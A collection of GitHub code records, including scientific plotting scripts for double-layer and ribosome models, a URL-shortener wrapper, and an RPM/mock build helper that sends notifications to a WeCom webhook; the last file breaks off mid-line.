+{"seq_id":"4158333907","text":"\"\"\"\nMaking Gouy-Chapman-Stern theory plots for introduction\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nimport matplotlib.transforms as mtransforms\n\nfrom edl import models\n\nrcParams[\"lines.linewidth\"] = 0.75\nrcParams[\"font.size\"] = 8\nrcParams[\"axes.linewidth\"] = 0.5\nrcParams[\"xtick.major.width\"] = 0.5\nrcParams[\"ytick.major.width\"] = 0.5\n\npotentials = np.linspace(-1, 1, 200)\n\nmodel = models.AqueousVariableStern(100e-3, 6, 6, 6, 6)\nsweep = model.potential_sweep(potentials, tol=1e-3)\n\nfig = plt.figure(figsize=(5, 2))\nax1 = fig.add_subplot(121)\nax2 = fig.add_subplot(122)\n\nax1.plot(\n sweep[\"phi0\"],\n sweep[\"charge\"] * 100,\n label=\"Cont.\",\n color=\"black\",\n)\nax2.plot(sweep[\"phi0\"], sweep[\"capacity\"] * 100, color=\"black\")\n\ncomsol_neg = np.loadtxt(\"comsol_data/70nm_nano_electrode_charge_neg.txt\")\ncomsol_pos = np.loadtxt(\"comsol_data/70nm_nano_electrode_charge_pos.txt\")\nchg_neg = comsol_neg[:, 1] / model.kappa_debye**2 / (35e-9) ** 2 / np.pi\nchg_pos = (\n (comsol_pos[:, 1] - comsol_pos[0, 1] + comsol_neg[0, 1])\n / model.kappa_debye**2\n / (35e-9) ** 2\n / np.pi\n)\nphi = np.concatenate([comsol_neg[::-1, 0], comsol_pos[:, 0]], axis=0)\nchg = np.concatenate([chg_neg[::-1], chg_pos], axis=0)\ncap = np.gradient(chg_neg[::-1], comsol_neg[::-1, 0])\n\nax1.plot(phi, chg, \"k--\", label=\"70nm\")\nax2.plot(comsol_neg[::-1, 0], cap, \"k--\")\nax1.set_xlim([-1, 1])\nax1.set_ylabel(r\"$\\sigma$ / $\\mu$C cm$^{-2}$\")\nax1.set_xlabel(r\"$\\phi_0$ / V\")\nax2.set_xlabel(r\"$\\phi_0$ / V\")\nax1.legend(frameon=False)\nax2.set_ylabel(r\"$C$ / $\\mu$F cm$^{-2}$\")\nax2.set_xlim([-1, 0])\nax2.set_ylim([0, 100])\n\nlabels = [\"(a)\", \"(b)\", \"(c)\", \"(d)\", \"(e)\", \"(f)\"]\nfor label, axis in zip(labels, fig.axes):\n # label physical distance to the left and up:\n trans = mtransforms.ScaledTranslation(-25 / 72, 10 / 72, fig.dpi_scale_trans)\n axis.text(\n 0.0,\n 1.0,\n label,\n transform=axis.transAxes + trans,\n fontsize=\"medium\",\n va=\"bottom\",\n )\n\nplt.tight_layout()\nplt.savefig(\"figures/comsol-cap.pdf\")\nplt.show()\n","repo_name":"lucasdekam/double-layer-modelling","sub_path":"plot_comsol_data.py","file_name":"plot_comsol_data.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"35862450544","text":"\"\"\"\nPlots ribosome capacity\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom six.moves import cPickle\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport os\n\nfrom models.ecoli.analysis import singleAnalysisPlot\nfrom wholecell.analysis.analysis_tools import exportFigure\nfrom wholecell.analysis.analysis_tools import read_bulk_molecule_counts\nfrom wholecell.io.tablereader import TableReader\nfrom wholecell.utils import units\n\nFONT = {\n\t'size':\t8\n\t}\n\n\nclass Plot(singleAnalysisPlot.SingleAnalysisPlot):\n\tdef do_plot(self, simOutDir, plotOutDir, plotOutFileName, simDataFile, validationDataFile, metadata):\n\t\twith open(simDataFile, 'rb') as f:\n\t\t\tsim_data = cPickle.load(f)\n\n\t\t# Load data from KB\n\t\tnAvogadro = sim_data.constants.n_avogadro\n\n\t\t# Listeners used\n\t\tunique_molecules_reader = TableReader(os.path.join(simOutDir, \"UniqueMoleculeCounts\"))\n\t\tmain_reader = TableReader(os.path.join(simOutDir, \"Main\"))\n\t\tribosome_reader = TableReader(os.path.join(simOutDir, \"RibosomeData\"))\n\n\t\t# Get IDs of ribosome subunits\n\t\tribosome_subunit_ids = [\n\t\t\tsim_data.molecule_ids.s50_full_complex,\n\t\t\tsim_data.molecule_ids.s30_full_complex,\n\t\t\t]\n\n\t\t# Get masses of full ribosomes and subunits\n\t\tribosome_subunit_masses = sim_data.getter.get_masses(ribosome_subunit_ids)\n\t\tfull_ribosome_mass = units.sum(ribosome_subunit_masses)\n\n\t\t# Read time data\n\t\tinitial_time = main_reader.readAttribute(\"initialTime\")\n\t\ttime = main_reader.readColumn(\"time\") - initial_time\n\t\ttimeStep = main_reader.readColumn(\"timeStepSec\")\n\n\t\t# Calculate the elongation rate for the given condition\n\t\tnutrients = sim_data.conditions[sim_data.condition][\"nutrients\"]\n\t\telongation_rate = sim_data.process.translation.ribosomeElongationRateDict[nutrients].asNumber(units.aa/units.s)\n\n\t\t# Load ribosome data\n\t\tactual_elongations = ribosome_reader.readColumn(\"actualElongations\")\n\t\tactual_elongation_rate = actual_elongations / timeStep\n\n\t\t# Load counts of subunits and active ribosomes\n\t\t(ribosome_subunit_counts, ) = read_bulk_molecule_counts(\n\t\t\tsimOutDir, (ribosome_subunit_ids, ))\n\t\tactive_ribosome_index = unique_molecules_reader.readAttribute(\"uniqueMoleculeIds\").index('active_ribosome')\n\t\tactive_ribosome_counts = unique_molecules_reader.readColumn(\"uniqueMoleculeCounts\")[:, active_ribosome_index]\n\n\t\t# Calculate statistics\n\t\ttotal_ribosome_counts = active_ribosome_counts + ribosome_subunit_counts.min(axis=1)\n\t\ttotal_ribosome_capacity = total_ribosome_counts * elongation_rate\n\n\t\tfree_subunit_mass = (\n\t\t\t(ribosome_subunit_masses * ribosome_subunit_counts / nAvogadro).asNumber(units.fg)\n\t\t\t).sum(axis=1)\n\t\tactive_ribosome_mass = (full_ribosome_mass * active_ribosome_counts / nAvogadro).asNumber(units.fg)\n\t\ttotal_ribosome_mass = free_subunit_mass + active_ribosome_mass\n\t\tmass_fraction_active = active_ribosome_mass / total_ribosome_mass\n\n\t\tplt.figure(figsize = (8.5, 15))\n\t\tplt.rc('font', **FONT)\n\n\t\tribosomeCapacity_axis = plt.subplot(6,1,1)\n\t\tribosomeCapacity_axis.plot(\n\t\t\ttime / 60., total_ribosome_capacity,\n\t\t\tlabel=\"Theoretical total ribosome rate\", linewidth=2, color='b')\n\t\tribosomeCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate,\n\t\t\tlabel=\"Actual elongation rate\", linewidth=2, color='r')\n\t\tribosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tribosomeCapacity_axis.legend(ncol=2)\n\n\t\tactiveRibosomeCapacity_axis = plt.subplot(6,1,2)\n\t\tactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., active_ribosome_counts * elongation_rate,\n\t\t\tlabel=\"Theoretical active ribosome rate\", linewidth=2, color='b')\n\t\tactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate,\n\t\t\tlabel=\"Actual elongation rate\", linewidth=2, color='r')\n\t\tactiveRibosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tactiveRibosomeCapacity_axis.legend(ncol=2)\n\n\t\tinactiveRibosomeCapacity_axis = plt.subplot(6,1,3)\n\t\tinactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., ribosome_subunit_counts.min(axis=1) * elongation_rate,\n\t\t\tlabel=\"Theoretical inactive ribosome rate\", linewidth=2, color='b')\n\t\tinactiveRibosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tinactiveRibosomeCapacity_axis.legend(ncol=2)\n\n\t\tfractionalCapacity_axis = plt.subplot(6,1,4)\n\t\tfractionalCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate / total_ribosome_capacity,\n\t\t\tlinewidth=2, color='k')\n\t\tfractionalCapacity_axis.set_ylabel(\"Fraction of total ribosome capacity used\")\n\n\t\teffectiveElongationRate_axis = plt.subplot(6,1,5)\n\t\teffectiveElongationRate_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate / active_ribosome_counts,\n\t\t\tlinewidth=2, color='k')\n\t\teffectiveElongationRate_axis.set_ylabel(\"Relative elongation rate (aa/s/ribosome)\")\n\n\t\tfractionActive_axis = plt.subplot(6,1,6)\n\t\tfractionActive_axis.plot(\n\t\t\ttime / 60., mass_fraction_active,\n\t\t\tlinewidth=2, color='k')\n\t\tfractionActive_axis.set_ylabel(\"Mass fraction of active ribosomes\")\n\t\tfractionActive_axis.set_yticks(np.arange(0., 1.1, 0.1))\n\n\t\t# Save\n\t\tplt.tight_layout()\n\t\texportFigure(plt, plotOutDir, plotOutFileName, metadata)\n\t\tplt.close(\"all\")\n\n\nif __name__ == \"__main__\":\n\tPlot().cli()\n","repo_name":"CovertLab/WholeCellEcoliRelease","sub_path":"models/ecoli/analysis/single/ribosomeCapacity.py","file_name":"ribosomeCapacity.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"16"}
+{"seq_id":"3633861828","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# is gd api wrapper\n\nimport urllib\nimport requests\n\nclass IsGd:\n \n API_URL = 'http://is.gd/api.php?longurl='\n \n def shorten(self,uri):\n resp = requests.get(self.API_URL+urllib.quote(uri), timeout=30)\n if resp:\n return resp\n else:\n return False","repo_name":"starenka/ara","sub_path":"isgd.py","file_name":"isgd.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"29143123756","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n Authors:\n yifengyou <842056007@qq.com>\n\"\"\"\n\nimport argparse\nimport datetime\nimport glob\nimport json\nimport logging\nimport os\nimport os.path\nimport re\nimport subprocess\nimport sys\nimport time\nfrom logging.handlers import RotatingFileHandler\n\nimport requests\nimport select\n\nCURRENT_VERSION = \"0.1.0\"\nlogger = None\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d_%H%M%S\")\nmsg_token = \"4155d89f-0b1c-44a8-8411-4f40c1d95795\"\n\n\ndef timer(func):\n def wrapper(*args, **kwargs):\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n elapsed = end - start\n logger.info(f\"{func.__name__} took {elapsed} seconds\")\n return result\n\n return wrapper\n\n\nclass Wecom():\n \"\"\"\n 企业微信群聊机器人,官方文档:https://developer.work.weixin.qq.com/document/path/91770\n \"\"\"\n\n def __init__(self, key=None):\n if key is None:\n raise Exception(\" wecom api key is None \")\n self._key = key\n\n def do_send(self, data):\n res = None\n headers = {'Content-Type': 'application/json'}\n url = f'https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={self._key}'\n r = requests.post(url=url, headers=headers, data=json.dumps(data))\n try:\n res = json.loads(r.text)\n except:\n pass\n if r.status_code == 200 and res and 'errcode' in res and 0 == res['errcode']:\n logger.info('* wecomBot send msg success')\n else:\n logger.info('* wecomBot send msg failed!')\n logger.info(r.text)\n\n def send_markdown(self, msg):\n data = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\n \"content\": msg,\n },\n }\n self.do_send(data)\n\n\ndef init_logger(args):\n global logger, timestamp\n logger = logging.getLogger(\"mbuild\")\n console_handler = logging.StreamHandler(sys.stderr)\n console_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(name)s: %(message)s'))\n logger.addHandler(console_handler)\n logfile = os.path.join(args.workdir,\n \"mbuild_\" + timestamp\n )\n file_handler = RotatingFileHandler(\n filename=logfile,\n encoding='UTF-8',\n maxBytes=1024000,\n backupCount=10\n )\n file_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(name)s: %(message)s'))\n logger.addHandler(file_handler)\n logger.setLevel(logging.INFO)\n\n\ndef check_python_version():\n current_python = sys.version_info[0]\n if current_python == 3:\n return\n else:\n raise Exception('Invalid python version requested: %d' % current_python)\n\n\ndef do_exe_cmd(cmd, print_output=False, shell=False):\n stdout_output = ''\n stderr_output = ''\n if isinstance(cmd, str):\n cmd = cmd.split()\n elif isinstance(cmd, list):\n pass\n else:\n raise Exception(\"unsupported type when run do_exec_cmd\", type(cmd))\n\n # print(\"Run cmd:\" + \" \".join(cmd))\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell)\n while True:\n # 使用select模块,监控stdout和stderr的可读性,设置超时时间为0.1秒\n rlist, _, _ = select.select([p.stdout, p.stderr], [], [], 0.1)\n # 遍历可读的文件对象\n for f in rlist:\n # 读取一行内容,解码为utf-8\n line = f.readline().decode('utf-8').strip()\n # 如果有内容,判断是stdout还是stderr,并打印到屏幕,并刷新缓冲区\n if line:\n if f == p.stdout:\n if print_output == True:\n print(\"STDOUT\", line)\n stdout_output += line + '\\n'\n sys.stdout.flush()\n elif f == p.stderr:\n if print_output == True:\n print(\"STDERR\", line)\n stderr_output += line + '\\n'\n sys.stderr.flush()\n else:\n print(\"UNKOWN:\", line)\n if p.poll() is not None:\n break\n return p.returncode, stdout_output, stderr_output\n\n\ndef do_sendmsg(args, ret=0, stdout=\"\", stderr=\"\", extra=\"\"):\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : {' '.join(sys.argv)}\\n\" \\\n f\"返回值 : {ret}\\n\" \\\n f\"输出 : {stdout}\\n\" \\\n f\"错误 : {stderr}\\n\" \\\n f\"附加 : {extra}\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\ndef handle_stat(args):\n pass\n\n\ndef rpmbuild_per_srpm(srpm):\n # 获取srpm名称 N-V-R\n ret, srpm_name, stderr = do_exe_cmd([\"rpm\", \"-qp\", \"--queryformat\", \"%{NAME}\", srpm], print_output=True)\n if ret != 0:\n logger.error(f\" query srpm file ret is not zero [{ret}] {stderr}\")\n return\n srpm_name = srpm_name.strip()\n logger.info(f\"srpm name : [{srpm_name}]\")\n\n # 创建构建目录\n topdir = os.path.dirname(srpm)\n mbuilddir = os.path.join(topdir, srpm_name)\n if not os.path.exists(mbuilddir):\n os.makedirs(mbuilddir, exist_ok=True)\n logger.info(f\"mbuild dir : {mbuilddir}\")\n rpmbuilddir = os.path.join(mbuilddir, \"rpmbuild_\" + timestamp)\n if not os.path.exists(mbuilddir):\n os.makedirs(rpmbuilddir, exist_ok=True)\n logger.info(f\"rpmbuild dir : {rpmbuilddir}\")\n\n ret, stdout, stderr = do_exe_cmd(\n [\"rpm\", \"-ivh\", \"--define\", f\"_topdir {rpmbuilddir}\", f\"{srpm}\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" install srpm {srpm} to {rpmbuilddir} failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_srpminstall_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n # 检查spec\n specs = glob.glob(f\"{rpmbuilddir}/SPECS/*.spec\")\n if len(specs) == 0:\n logger.error(f\"no specs found!\")\n return\n elif len(specs) > 1:\n logger.error(f\"found spec more than one [{len(specs)}]\")\n return\n spec = os.path.abspath(specs[0])\n logger.info(f\"using spec {spec}\")\n\n # 导出rpm -qa记录\n ret, stdout, stderr = do_exe_cmd([\"rpm\", \"-qa\"], print_output=False)\n if ret != 0:\n # logger.error(f\" query all rpm failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_rpmqa_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n rpm_manifest = os.path.join(mbuilddir, \"mbuild_rpm-manifest_\" + timestamp)\n with open(rpm_manifest, 'w') as fd:\n fd.write(stdout)\n\n # 安裝依赖\n ret, stdout, stderr = do_exe_cmd([\"yum\", \"builddep\", \"-y\", spec], print_output=True)\n if ret != 0:\n # logger.error(f\" yum builddep failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_builddep_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(mbuilddir, \"mbuild_builddep.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n\n # rpmbuild编译\n ret, stdout, stderr = do_exe_cmd(\n [\"rpmbuild\", \"--define\", f\"_topdir {rpmbuilddir}\", \"-ba\", f\"{spec}\", \"--nocheck\"],\n print_output=True)\n if ret != 0:\n # logger.error(f\" rpmbuild failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_build_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(mbuilddir, \"mbuild_rpmbuild.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n\n\n@timer\ndef handle_build(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if args.srpm and len(args.srpm) > 0:\n total = len(args.srpm)\n for index, srpm in enumerate(args.srpm):\n if not os.path.exists(srpm) or not os.path.isfile(srpm):\n logger.error(f\"{srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n rpmbuild_per_srpm(srpm_path)\n else:\n srpms = glob.glob(f\"{args.workdir}/*.src.rpm\")\n if not srpms:\n logger.error(f\"No src.rpm found in {args.workdir}\")\n exit(1)\n total = len(srpms)\n for index, srpm in enumerate(srpms):\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n rpmbuild_per_srpm(srpm_path)\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : {' '.join(sys.argv)}\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\n@timer\ndef handle_localinstall(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if not args.srpm:\n logger.error(f\" must specific target srpm\")\n\n if not os.path.exists(args.srpm) or not os.path.isfile(args.srpm):\n logger.error(f\"{args.srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(args.srpm)\n\n ret, stdout, stderr = do_exe_cmd(\n [\"rpm\", \"-ivh\", \"--define\", f\"_topdir {workdir}\", f\"{srpm_path}\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" install srpm {srpm} to {rpmbuilddir} failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_srpminstall_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n else:\n logger.info(f\"localinstall {srpm_path} success!\")\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : {' '.join(sys.argv)}\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\n@timer\ndef handle_localbuild(args):\n \"\"\"\n 编译指定目录\n :param args:\n :return:\n \"\"\"\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n # 检查工作目录是否为rpmbuild目录(包含SOURCES、SPECS)\n if not os.path.exists(os.path.join(workdir, \"SOURCES\")) or not os.path.exists(os.path.join(workdir, \"SPECS\")):\n logger.error(f\"No SOURCES or SPECS dir found in {workdir}\")\n return\n\n # 检查spec,获取SPEC绝对路径spec\n specs = glob.glob(f\"{workdir}/SPECS/*.spec\")\n if len(specs) == 0:\n logger.error(f\"no specs found!\")\n return\n elif len(specs) > 1:\n logger.error(f\"found spec more than one [{len(specs)}]\")\n return\n spec = os.path.abspath(specs[0])\n logger.info(f\"using spec {spec}\")\n\n # 导出rpm -qa记录\n ret, stdout, stderr = do_exe_cmd([\"rpm\", \"-qa\"], print_output=False)\n if ret != 0:\n # logger.error(f\" query all rpm failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_rpmqa_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n rpm_manifest = os.path.join(workdir, \"mbuild_rpm-manifest_\" + timestamp)\n with open(rpm_manifest, 'w') as fd:\n fd.write(stdout)\n\n # 安裝依赖\n ret, stdout, stderr = do_exe_cmd([\"yum\", \"builddep\", \"-y\", spec], print_output=True)\n if ret != 0:\n # logger.error(f\" yum builddep failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_builddep_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(workdir, \"mbuild_builddep.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n # rpmbuild编译\n ret, stdout, stderr = do_exe_cmd(\n [\"rpmbuild\", \"--define\", f\"_topdir {workdir}\", \"-ba\", f\"{spec}\", \"--nocheck\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" rpmbuild failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_build_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(workdir, \"mbuild_rpmbuild.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : {' '.join(sys.argv)}\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\ndef handle_clean(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n print(f\"workdir: {workdir}\")\n\n # 检查spec\n logs = glob.glob(f\"{workdir}/mbuild_*\")\n if len(logs) == 0:\n print(f\"no mbuild log found! bye~\")\n return\n for l in logs:\n if os.path.isfile(l):\n os.remove(l)\n print(f\"delete {l} done!\")\n print(f\"clean done\")\n\n\ndef mockbuild_per_srpm(args, srpm):\n srpm_path = os.path.abspath(srpm)\n\n # 选择输出目录\n if not args.output:\n # 获取srpm名称 N-V-R\n ret, srpm_name, stderr = do_exe_cmd(\n [\"rpm\", \"-qp\", \"--nosignature\", \"--nodigest\", \"--queryformat\", \"%{NAME}\", srpm_path],\n print_output=False\n )\n if ret != 0:\n msg = f\" query srpm file ret is not zero [{ret}] {stderr}\"\n logger.error(msg)\n do_sendmsg(args, ret=-1, stderr=msg)\n return\n srpm_name = srpm_name.strip()\n logger.info(f\"srpm name : [{srpm_name}]\")\n\n # 创建构建目录\n topdir = os.path.dirname(srpm_path)\n output_dir = os.path.join(topdir, srpm_name)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir, exist_ok=True)\n logger.info(f\"output_dir dir : {output_dir}\")\n else:\n try:\n os.makedirs(args.output, exist_ok=True)\n except Exception as e:\n msg = f\"failed to create {args.output}\"\n logger.error(msg)\n do_sendmsg(args, ret=-1, stderr=msg)\n exit(1)\n output_dir = args.output\n\n if not args.root:\n root = \"rocky-8-x86_64\"\n else:\n root = args.root\n\n # mock编译\n cmd = [\n \"/usr/bin/mock\",\n \"--root\", f\"{root}\",\n \"--rebuild\", f\"{srpm_path}\",\n \"--resultdir\", f\"{output_dir}\",\n \"--verbose\"\n ]\n logger.info(f\"run cmd {' '.join(cmd)}\")\n ret, stdout, stderr = do_exe_cmd(cmd, print_output=True, shell=False)\n if ret != 0:\n # logger.error(f\" rpmbuild failed! [{ret}] {stderr}\")\n errorlog = os.path.join(output_dir, \"mbuild_mock_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n do_sendmsg(args, ret=ret)\n return\n buildlog = os.path.join(output_dir, \"mbuild_mock.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n\n@timer\ndef handle_mock(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if args.srpm:\n if not os.path.exists(args.srpm) or not os.path.isfile(args.srpm):\n logger.error(f\"{args.srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(args.srpm)\n mockbuild_per_srpm(args, srpm_path)\n else:\n srpms = glob.glob(f\"{args.workdir}/*.src.rpm\")\n if not srpms:\n logger.error(f\"No src.rpm found in {args.workdir}\")\n exit(1)\n total = len(srpms)\n for index, srpm in enumerate(srpms):\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n mockbuild_per_srpm(args, srpm_path)\n\n do_sendmsg(args)\n\n\ndef handle_check(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n print(f\"workdir: {workdir}\")\n\n def find_rpm_files(dir_path):\n flag = False\n rpms = []\n for entry in os.scandir(dir_path):\n if entry.is_file() and entry.name.endswith(\".rpm\"):\n flag = True\n rpms.append(os.path.basename(entry.path))\n elif entry.is_dir():\n find_rpm_files(entry.path)\n if flag:\n print(f\"[+] {os.path.abspath(dir_path)}\")\n for r in rpms:\n print(f\"\\t[-] {r}\")\n\n find_rpm_files(workdir)\n\n\ndef main():\n global CURRENT_VERSION\n check_python_version()\n\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\"-v\", \"--version\", action=\"store_true\",\n help=\"show program's version number and exit\")\n parser.add_argument(\"-h\", \"--help\", action=\"store_true\",\n help=\"show this help message and exit\")\n\n subparsers = parser.add_subparsers()\n\n # 定义base命令用于集成\n parent_parser = argparse.ArgumentParser(add_help=False, description=\"mbuild - a tool for kernel development\")\n parent_parser.add_argument(\"-V\", \"--verbose\", default=None, action=\"store_true\", help=\"show verbose output\")\n parent_parser.add_argument(\"-j\", \"--job\", default=os.cpu_count(), type=int, help=\"job count\")\n parent_parser.add_argument(\"-o\", \"--output\", default=None, help=\"output dir path\")\n parent_parser.add_argument(\"-w\", \"--workdir\", default=\".\", help=\"setup workdir\")\n parent_parser.add_argument('-d', '--debug', default=None, action=\"store_true\", help=\"enable debug output\")\n parent_parser.add_argument('-q', '--quiet', default=False, action=\"store_true\", help=\"keep quiet, no msg send\")\n\n # 添加子命令 stat\n parser_stat = subparsers.add_parser('stat', parents=[parent_parser])\n parser_stat.set_defaults(func=handle_stat)\n\n # 添加子命令 build\n parser_build = subparsers.add_parser('build', parents=[parent_parser])\n parser_build.add_argument('-s', '--srpm', nargs=\"+\", default=None, help=\"build specific srpm\")\n parser_build.set_defaults(func=handle_build)\n\n # 添加子命令 localinstall\n parser_localinstall = subparsers.add_parser('localinstall', parents=[parent_parser])\n parser_localinstall.set_defaults(func=handle_localinstall)\n\n # 添加子命令 localbuild\n parser_localbuild = subparsers.add_parser('localbuild', parents=[parent_parser])\n parser_localbuild.set_defaults(func=handle_localbuild)\n\n # 添加子命令 handle_mock\n parser_mock = subparsers.add_parser('mock', parents=[parent_parser])\n parser_mock.add_argument('-r', '--root', default=None, help=\"specific mock config\")\n parser_mock.add_argument('-s', '--srpm', nargs=\"+\", default=None, help=\"build specific srpm\")\n parser_mock.set_defaults(func=handle_mock)\n\n # 添加子命令 clean\n parser_clean = subparsers.add_parser('clean', parents=[parent_parser])\n parser_clean.set_defaults(func=handle_clean)\n\n # 添加子命令 check\n parser_check = subparsers.add_parser('check', parents=[parent_parser])\n parser_check.set_defaults(func=handle_check)\n\n # 开始解析命令\n args = parser.parse_args()\n\n # 解析命令后解析配置文件,合并两者\n for filename in os.listdir('.'):\n if filename.endswith(\".mbuild\"):\n print(\"load config file %s\" % filename)\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n match = re.match(r'(\\w+)\\s*=\\s*([\\w/.-]+)', line)\n if match:\n key = match.group(1)\n value = match.group(2)\n # 如果命令行没有定义key,则使用配置中的KV\n if not hasattr(args, key):\n setattr(args, key, value)\n # 如果命令行未打开选项,但配置中打开,则使用配置中的KV\n if getattr(args, key) is None:\n setattr(args, key, value)\n\n if 